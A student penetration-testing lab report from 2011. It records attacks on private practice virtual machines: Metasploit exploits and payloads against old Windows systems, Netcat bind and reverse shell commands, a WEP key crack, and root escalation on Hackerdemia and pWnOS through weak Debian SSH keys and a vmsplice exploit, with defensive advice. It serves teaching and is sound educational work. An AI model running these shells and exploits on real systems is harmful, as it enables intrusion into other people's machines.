Penetration Report - · PDF file06.03.2011 · This penetration report is for educational purposes only. ... 5.2.3 Findings ... Aircrack performed a PTW method attack against the file

1 Juan Ortega, [email protected]

1

Penetration Report [NTS330 – Unit 4 Penetration]

V1.0

Juan Ortega

3/6/2011


2

Document Properties

Title Deviant Alert, Inc. Penetration Active Recon Report Version V1.0 Author Juan Ortega Pen-testers Juan Ortega Reviewed By Approved By Classification Confidential

Version Control

Version Date Author Description

V1.0 March 7,2011 Juan Ortega Final Draft

Disclaimer:

This penetration report is for educational purposes only. Penetration testing tools (enumeration, vulnerability scanning, and passive/active recon) are tested within a private virtual network set up surely for the purpose of elevating my knowledge. Everything within this document is factious; any similarities to actual things are purely coincidence.


3

1. Executive Summary

The active penetration attempts were a success. Metasploit was tested against a veriety of operating systems: Windows XP SP1-2, Windows 2003 R2, and Ubuntu. All but Ubuntu received an interpreter shell and a VNC view. Netcat was a simple and effective way to pass communication between two parties. As the Swiss Army Knife for TCP, a variety of function and options were available to exercise upon. Wireless penetration was fast and easy. The IVs were cracked in a matter of seconds and the WEP key was attained. Hackerdemia is buldled with holes and vulnerabilities, penetrating that system were a cinch through a Netcat backdoor. Finally, pWnOS pose a challenge with limited ports but weak SSH keys lead to root escalation privileges.


4

Table of Contents

1. Executive Summary --------------------------------------------------------------------------------------------- 3

Table of Illustrations ------------------------------------------------------------------------------------------------- 5

1.0 Project Objectives ------------------------------------------------------------------------------------------ 5

2.0 Timeline ------------------------------------------------------------------------------------------------------- 5

3.0 Summary of Findings -------------------------------------------------------------------------------------- 5

4.0 Summary of Recommendation -------------------------------------------------------------------------- 6

5.0 Detailed Findings ------------------------------------------------------------------------------------------- 7

5.1 Lab 1 – [Metasploit Lab] ---------------------------------------------------------------------------------- 7

5.1.1 Scope of Work -------------------------------------------------------------------------------------7

5.1.2 Assessment Guided Questions ---------------------------------------------------------------- 7

5.2 Lab 2 – [Netcat Lecture / Lab] ------------------------------------------------------------------------- 10

5.2.1 Scope of Work ----------------------------------------------------------------------------------- 10

5.2.2 Assumptions ------------------------------------------------------------------------------------- 10

5.2.3 Findings (Figures are located in Appendix) ----------------------------------------------- 10

5.3 Lab 3 – [Wireless Hacking Lab] ------------------------------------------------------------------------ 14

5.3.1 Scope of Work ----------------------------------------------------------------------------------- 14

5.3.2 Assumptions ------------------------------------------------------------------------------------- 14


5.4 Lab 4 – [Hackerdemia & pWnOS Lab] ---------------------------------------------------------------- 15

5.4.1 Scope of Work ----------------------------------------------------------------------------------- 15

5.4.2 Assumptions ------------------------------------------------------------------------------------- 15


6.0 Appendix ---------------------------------------------------------------------------------------------------- 18

7.0 References -------------------------------------------------------------------------------------------------- 24


5

Table of Illustrations

1.0 Project Objectives

1.1 The objectives are the following:

1.1.1 Download and install the Metasploit Framework to be used.

1.1.2 Work with Netcat; an introduction to the Swiss Army Knife for TCP. To grab banners from daemons, listen to open ports, and create a backdoor.

1.1.3 Discover wireless access points with WEP key enabled. Perform a penetration in an attempt to retrieve the password.

1.1.3 Download and perform penetration on Hackerdemia and pWnOS operating systems.

2.0 Timeline

The timeline of the test:

Penetration Testing Start Date/Time End Date/Time

Lab 1: Metasploit Framework 4 March 2010 6 March 2010 Lab 2: Netcat Lecture / Lab 4 March 2010 6 March 2010 Lab 3: Wireless Hacking Lab 6 March 2010 6 March 2010 Lab 4: Hackerdemia & pWnOS Lab

6 March 2010 6 March 2010

Table 1 Penetration Testing Timeline

3.0 Summary of Findings

3.1 Metasploit was very simple to install in /opt with no problems. After updating the framework and starting it – Nessus was loaded. A total of 4 VMs were tested and exploited


6

in this penetration exercise. Nessus was primary ran to scan for vulnerabilities. The report was then imported to Metasploit to check if exploits are available for those individual vulnerabilities using ‘db_import <name>.nessus’ Most resulted in positive results, and this methods saves the hassle of manually specifying each exploit. In the end, only Ubuntu stood because it is not as vulnerable as the Windows systems.

3.2 Netcat is a powerful yet simple Swiss army knife. From reading banners, port scan, print port status, bind and listen verbosely, transferring files, bind to a shell, reserve shell, and conduct port redirection, almost anything communication wise, this tool can do. Newer versions of netcat removed the ‘-e’ argument for security, but there was a way around it.

3.3 Although a burden to not hack a wireless device that supported monitor mode; cracking the IVs was very simple. Aircrack performed a PTW method attack against the file and succeeded while FMS/Korek failed.

3.4 Hackerdemia is an extremely vulnerable system, just running a port scan revealed more than 26 ports open, all running outdated services. A Nessus scan resulted in over 176+ vulnerabilities . Surprisingly, none of the Metasploit exploits worked against Hackerdemia. In the end, a backdoor safely binded to port 1337 can instantly lead to root access. pWnOS is a bit more secure than Hackerdemia having only a couple ports open. Having spend some time analyzing PHP on apache and webadmin and failing, I gained root privileges by a weak SSH key and vmsplice.

4.0 Summary of Recommendation

4.1 When securing a system, always remember to run a vulnerability scanner at the end – just to make sure. Nessus and Metasploit together makes security penetration child’s play; you want to give the attacker as much of a hard time as possible to compromise the system. The VMs tested on all need to be upgraded. The two Windows XP boxes, need at least Service Pack 3 or Windows 7; Windows 2003 needs to have the latest Service Pack as well or Windows 2008. Ubuntu also needs to be upgraded to version 10+. Just because penetrating Ubuntu was unsuccessful it does not mean it is impossible – only takes time. If Nessus returns little to no low risk vulnerabilities, the systems are only partly less susceptible.

4.2 It is very easy for attackers to create a backdoor using Netcat. It is very easy for them to get passed firewalls using redirection and reverse shells. A utility called “RootkitRevealer” can be used to check for local root kits. Good firewall policies, Intrusion detection/prevention systems, MAC addresses, can all be used to prevent back door more effectively. The command ‘ps -A | grep nc’ checks for any Netcat back doors running in the background listening. ‘netstat -l’ can also be used.

http://technet.microsoft.com/en-us/sysinternals/bb897445


7

4.3 When having a wireless access point available. Especially if the signal reaches outside the building, always have it encrypted with WPA2. WEP was never meant to be secure and can be cracked in minutes. The file WeakIVs.zip holding the packets gathered from the access point, it only took seconds to crack the 128 bit WEP key. In addition to WPA2, MAC filtering, and disable broadcast BSSID can also be somewhat helpful. Finally, always have the wireless access point away from the internet network, set it up on the DMZ.

4.3 Hackerdemia and pWnOS are meant to be very vulnerable systems. Only recommendation is never to use them in production use, and not have services up configured the same way as these systems.

5.0 Detailed Findings

5.1 Lab 1 – [Metasploit Lab]

5.1.1 Scope of Work

Download and install Metasploit Framework on a Slackware Linux system. Select targets from a variety of operating systems including: Windows XP SP1-2, Windows 2003 R2, and Ubuntu. Test exploits and workable payloads against the systems.

5.1.2 Assumptions

The target system 172.16.82.128 contains Windows XP SP1 which should reveal a multitude of available exploits to be used against the system. Windows XP SP2 will also be scanned for vulnerabilities as well as exploits to recognize the major differences between the two service packs. In addition, Ubuntu and Windows Server 2003 will also attempt a penetration.

5.1.2 Findings (Figures are located in Appendix)

[Windows XP SP1] – 172.16.82.128

5.1.2.1 Instead of specifically entering an exploit Metasploit can use against Windows XPSP1, I wanted to utilize the db_import_nbe function. It works by dumping a Nessus scan, and letting Metasploit do all the work by finding matching exploits that work with the vulnerabilities. The process was simple and straightforward. I used the function “db_autopwn –x –t” for matching exploits.


8

Metasploit was able to find 6 Matching Exploit Modules:

ms03_026_dcom (CVE-2003-0352) BID-8205 OSVDB-2100

ms04_011_lsass (CVE-2003-0533) BID-10108 OSVDB-5248

ms06_040_netapi (CVE-2006-3439) BID-19409 OSVDB-27845

psexec (CVE-1999-0504) OSVDB-3106


The ms06_040_netapi module was included twice.

Because db_import_nbe is deprecated, db_import was used instead.

Exploit used: msf->use exploit/windows/smb/ms06_040_netapi

Payload used: msf-exploit(ms06_040_netapi)> set PAYLOAD windows/meterpreter/bind_tcp

Payloads Tried. Success?

windows/shell/bind_tcp Yes windows/vncinject/bind_tcp Yes windows/adduser Yes windows/exec Yes

Some of the modules caused the Windows to be stale and prevented other exploits to be used consecutively. A restart was needed after some modules executed.

[Windows XP SP2] – 172.16.82.129

5.1.2.2 Instead of specifically entering an exploit Metasploit can use against Windows

Get Matching exploits: msf-> db_autopwn -t -x



ms08_067_netapi (CVE-2008-4250) OSVDB-49243


9



windows/meterpreter/bind_tcp Yes windows/shell/bind_tcp Yes windows/vncinject/bind_tcp Yes windows/adduser Yes windows/exec Yes

The payloads loaded better than Windows SP1 without problems or crashes. No restarts at all. The user ‘metasploit’ was added to the target system.

[Windows Server 2003] – 172.16.82.134

5.1.2.3 A Nessus report scan was dumped into Metasploit as well.



ms08_067_netapi (CVE-2008-4250) OSVDB-49243

Only two modules showed up.



windows/meterpreter/bind_tcp Yes windows/shell/bind_tcp No windows/vncinject/bind_tcp No windows/adduser No windows/exec No

It seems CIFS isn’t as stable as Windows XP SP2 is. The first attempt at a meterpreter was a success, but it seems it crashed afterward since none of the other payloads worked. A restart might have been needed like Windows XP SP1.

[Ubuntu] – 172.16.82.132

5.1.2.4 A Nessus report scan was dumped into Metasploit as well.



10


One exploit showed up due to CIFS, the default installation of Samba.

Exploit used: msf->use exploit/windows/smb/psexec


windows/meterpreter/bind_tcp No windows/shell/bind_tcp No windows/vncinject/bind_tcp No windows/adduser No generic/shell_bind_tcp No windows/exec No

None of the payloads worked because I still needed a User and Pass to log into samba. The payloads would probably have worked with that information. I could have gone forward and tried obtaining the information, but that is beyond the scope of this exercise.

5.2 Lab 2 – [Netcat Lecture / Lab]

5.2.1 Scope of Work

An introduction to Netcat would consist of basic commands: grab Headers from daemons, listen verbosely to a port, bind a shell, connect to ports, and a few others.

5.2.2 Assumptions

Using Netcat before would make the lab simple. Nothing unusual will occur.


5.2.3.1 Grab the Banner

$ nc -v 172.16.82.132 22 –w 1 > /tmp/bannergrab

This is a very simple command to grab the banner from a system running SSH. The same arguments can be used for any service. By default all sshd daemons grab the /etc/motd to use as banner.


11

5.2.3.2 Verify an open port

I am going to verify the obvious if port 80 is open in the same target system running Ubuntu.

$ nc –zv 172.16.82.132 80

(UNKOWN) [172.16.82.132] 80 (http) open

Using the ‘z’ and ‘v’ arguments, I was able to the status of the port whether its closed or open – it declared it open and listening.

5.2.3.3 Grab a HEAD

$ nc 172.16.82.132 80

HEAD / HTTP/0.1

The command will output the header of Apache (HTTP). For some reason “nc 172.16.82.132 80 < /bin/echo ‘HTTP / HTTP/0.1’” did not seem to work very well.

5.2.3.4 Verbosely listen to a port, and have another connection send a string of text.

Computer 1:

$ nc -l 1337

Computer 2:

$ echo “Hello World” > output_file.txt

$ nc 172.16.82.132 1337 < output_file.txt

The same commands can be used to send files since output_file.txt is a file itself. Computer 1 however needs a “> output_file.txt” argument at the end to receive it, otherwise the output will be sent to stdin which Is the terminal.

5.2.3.5 Transfer a file called transfer.txt to a listening port.

Computer 1:


12

$ nc -l 1337 > transfer.txt

As stated in the last exercise, this is a simple process. Only difference is the listening computers have an output pipe to a file.

5.2.3.6 Send transfer.txt

Computer 2:

$ echo “Transfer Me” > transfer.txt

$ nc 172.16.82.132 1337 < transfer.txt

The file transfer.txt is outputted to the Netcat connection, and since the listening connection is outputting locally the packets to a file, the process will simply transfer a file.

5.2.3.7 Bind a shell port with Netcat.

Option 1 (Legacy versions):

$ nc -l -e /bin/sh localhost 1337

Option 2 (New versions):

$ mkfifo /tmp/pipe

$ sh /tmp/pipe | nc –l 1337 > /tmp/pipe

The Ubuntu system had a recent version of Netcat, meant the ‘-e’ argument used to bind programs to a port is gone. A way around would be to create a named pipeline to a temporary file. It works just the same.

5.2.3.8 Connect to the system with the shell binded to a port.

$ nc 172.16.82.132 1337

ls

Desktop

Documents


13

Downloads

Connecting to a backdoor would give the user an instant shell.

5.2.3.9 Create a reverse shell

User (me):

$ nc -lv 1337

On the Machine:

Option 1 (Legacy versions):

$ nc –e /bin/sh <My IP> 1337

Option 2 (New versions):

$ mkfifo /tmp/pipe

$ sh /tmp/pipe | nc localhost 1337 > /tmp/pipe

The user creates a listening port 1337. This allows the target computer to connect to it – the reverse. Option 2 is for newer Netcat versions.

5.2.3.10 Redirection is very similar to daisy chain SSH connections or using SSH Tunnel. Say on a target system running apache, a firewall is filtering packets through it. One way to connect to it is by setting up SSH Tunnel, to create a connection from localhost<port> to targer<port>. This will get passed the firewall. Netcat works similar (though unencrypted unless you use cryptcat or openssl, but not the same way. Netcat pipes the input to a port, executed the input in the shell, and pipes output to another port; sort of line a tunnel.


14

5.3 Lab 3 – [Wireless Hacking Lab]

5.3.1 Scope of Work

Develop a basic understanding of hacking wireless access points. WEP keys are easier to crack than WPA2.0 therefore it should be interesting if the password could be retrieved.

5.3.2 Assumptions

By lacking the necessary equipment to hack wireless access points would make this exercise difficult. A wireless card would need to support ‘monitor’ mode through ‘iwconfig’ in order to hack; thus for this lab I will grab the zip file provided.


5.3.3.1 Wardriving is the act of driving through neighborhoods, cities, or passageways to analyze wireless access points; to gather as much information as possible and hopefully explain to the supposed soon-to-be victim about the situation. Scanning for wireless networks around places is not a heavy task, all is needed is an antenna and the right software tools.

5.3.3.2 Tools to detect the presence of wireless networks:

iwlist

wifi-radar

Kismet

NetStumbler

Aircrack

Airsnort

5.3.3.3 Any of the tools listen above will reveal the BSSID of a wireless access point. If a user is hiding the BSSID, a presence can still be detected.

5.3.3.4 The service set identifier is used to separate wireless access points by name. It is not technically necessary or required to know it since most access points can be set up to conceal the


15

BSSID. Just like DNS, the BSSID is only for humans; all is need is the MAC address for a system to find it.

5.3.3.5 FMS stands for Fluher, Mantin, and Shamir attack.

5.3.3.6 Crack the WEK key provided in WeakIVs.zip

$ unzip WeakIVs.zip

$ aircrack-ng -b 00:1E:52:F6:A0:9B weakivs-02.ivs

KEY FOUND! [0B:4E:D3:F6:7C:C5:40:FE:98:36:BA:A6:52]

Decrypted correctly: 100%

Invoking the added “-K” for FMS/Korek method did not seem to work. Only the first method PTW was successful because it only works with arp request/reply packets.

5.4 Lab 4 – [Hackerdemia & pWnOS Lab]

5.4.1 Scope of Work

The scope of this exercise will consist of compromising the Hackerdemia and pWnOS systems. These are already super vulnerable systems that should be easy to exploit.

5.4.2 Assumptions

The Hackerdemia should be easier to get into than pWnOS. Hopefully both have many old daemon services running to compromise and return promising Nessus scan reports. Using the tools Metasploit, netcat, and nmap, compromising these systems is going to be easy.


[Hackerdemia]

5.4.3.1 Hackerdemia is set up as a VM and running.

5.4.3.2 I have compromised Hackerdemia.

5.4.3.3 After failing with Metasploit, I turned to Nmap and found a wealth of ports open. I noted one of the ports was called “Elite” residing on port 1337. This reminded me of the port Netcat always uses as a backdoor. I connected to the system.


16

$ nc 172.16.82.135 1337

whoami

root

Root access has been obtained.

5.4.3.4 Tools used:

1. Nessus reported many ports and vulnerabilities in Hackerdemia with 11 high risk holes, 9 of which for Apache.

2. Importing the Nessus scan to Metasploit was surprising. Only 4 matching modules found:

linux/samba/lsa_transnames_heap (CVE-2007-2446)

osx/samba/lsa_transnames_heap (CVE-2007-2446)

psexec (CVE-2007-2446)

windows/http/apache_mod_rewrite_ldap (CVE-2006-3747)

None of the exploits worked despite having 26 ports open and 176 total Nessus scan vulnerabilities.

3. Nmap returned a substantial amount of information and revealed how vulnerable the daemons really are. Most of the daemons were old and outdated leaving plenty of exploration.

4. Netcat was used to connect to serveral open ports in search for a backdoor or header information. I successes in finding a backdoor on port 1337 (Elite).

5.4.3.5 If I find a backdoor on a production web server, someone is not doing their job. This might be an indication to step up security and turn the web server into a bastion host and completely harden the network and system.\


17

[pWnOS]

5.4.3.6 pWnOS has started on the machine. I ran into a problem with the network; turns out you must press “I moved” button the first time pWnOS boots up so it does not change its MAC address.

5.4.3.7 Analysis conducted.

1. First thing was to try Nessus and Metasploit for any known exploits that could compromise the system right there. Metasploit returned psexec exploit but did not work.

2. Second attempt was to port scan the system for services. Nmap returned with port: 22, 80, 139, 445, 10000 opened. I took time analyzing Apache (80) and Webadmin (10000) by running a web vulnerability scanner against it, some promising results appeared.

Found out Apache was running phpMyAdmin 2.6.3-pl1 on: /php/phpMyAdmin I have tried running all the exploits I can find, only matching exploit was this one; but it required a log in.

Nikto returned with a vulnerability to Webadmin, CVE-2003-1553 OSVDB-44056 which is described, “Haakon Nilsen

Simple Internet Publishing System (SIPS) 0.2.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain password and other user information via a direct request to a user-specific configuration

Which can be obtained in: directory.”

/sips/sipssys/users/a/admin/user

3. Giving up on PHP I downloaded Webadmin Arbitrary File Disclosure Exploit and was able to read any file in the remote system.

4. Only high vulnerability Nessus returned was weak keys in the SSH daemon. CVE-2008-0166 Therefore I downloaded debian_ssh_rsa_2048_x86.tar.bz2.

5. Using Webadmin to grab the ssh keys from obama and yomama. I ran grep –lr <Key> *.pub against the debian rsa keys and found a match for both. Then got access by ‘ssh -I <key> [email protected]’

http://www.exploit-db.com/exploits/12642/


18

6. Next I downloaded vmsplice local root exploit and compiled. I transfer the binary file to pWnOS by using ‘scp –I <key> [email protected]:~’

7. Executed vmsplice and attained root access.

5.4.3.8-9 I have used the vmsplice Local Root exploit on pWnOS to obtain root privileges.

5.4.3.10 Exploits used:

Exploits tried. Success?

phpMyAdmin 2.6.3-pl1 No phpMyAdmin 2.5.7 Remote code injection exploit No phpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit No phpMyAdmin 3.1.0 (XSRF) SQL Injection Vulnerability No phpMyAdmin Config File code Injection No Apache (mod_rewrite) Remote Overflow PoC No WebAdmin Arbitrary File Disclosure Exploit Yes Linux Kernel 2.6.17 - .26.24.1 vmsplice Local Root Exploit Yes Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit Yes

6.0 Appendix

6.1 Lab 1 – [Metasploit Lab]

5.1.2.1– Windows XP SP1

5.1.2.2 - Windows XP SP2

mailto:[email protected]:~






http://www.exploit-db.com/exploits/2237

http://www.exploit-db.com/exploits/2017




19

5.1.2.3– Windows 2003 R2

5.1.2.4- Ubuntu

6.2 Lab 2 – [Netcat lecture / lab]

5.2.3.1


20

5.2.3.2

5.2.3.3

5.2.3.4

5.2.3.5


21

5.2.3.6

5.2.3.9

6.3 Lab 3 – [Wireless Hacking Lab]

5.3.3.6


22

6.4 Lab 2 – [Hackerdemia & pWnOS]

5.4.3.3 - Nmap Scan hackerdemia


23

5.4.3.4

5.4.3.7– Nikto Scan


24

5.4.3.8-9

7.0 References

1. Nikto2 Open Source web server scanner. Retrieved March 6, 2011 from cirt Web site: http://cirt.net/nikto2

2. Netcat cheat sheet. Retrieved March 6, 2011 from h.ackack.net Web site: http://h.ackack.net/cheat-sheets/netcat

3. Metasploit penetration framework. Retrieved March 6, 2011 from Metasploit Web site: http://www.metasploit.com/

4. Exploit Database – ultimate archive of exploits. Retrieved March 6, 2011 from exploit-db Web site: http://www.exploit-db.com/

http://cirt.net/nikto2

http://h.ackack.net/cheat-sheets/netcat

http://www.metasploit.com/

http://www.exploit-db.com/


25

5. The GNU Netcat Project. Retrieved March 6, 2011 from Sourceforge Web site: http://netcat.sourceforge.net/

6. Nessus. Retrieved March 6, 2011 from Nessus Web site: http://www.nessus.org/nessus/intro.php

7. Nmap. Retrieved March 6, 2011 from nmap Web site: http://nmap.org/

http://netcat.sourceforge.net/

http://www.nessus.org/nessus/intro.php

http://nmap.org/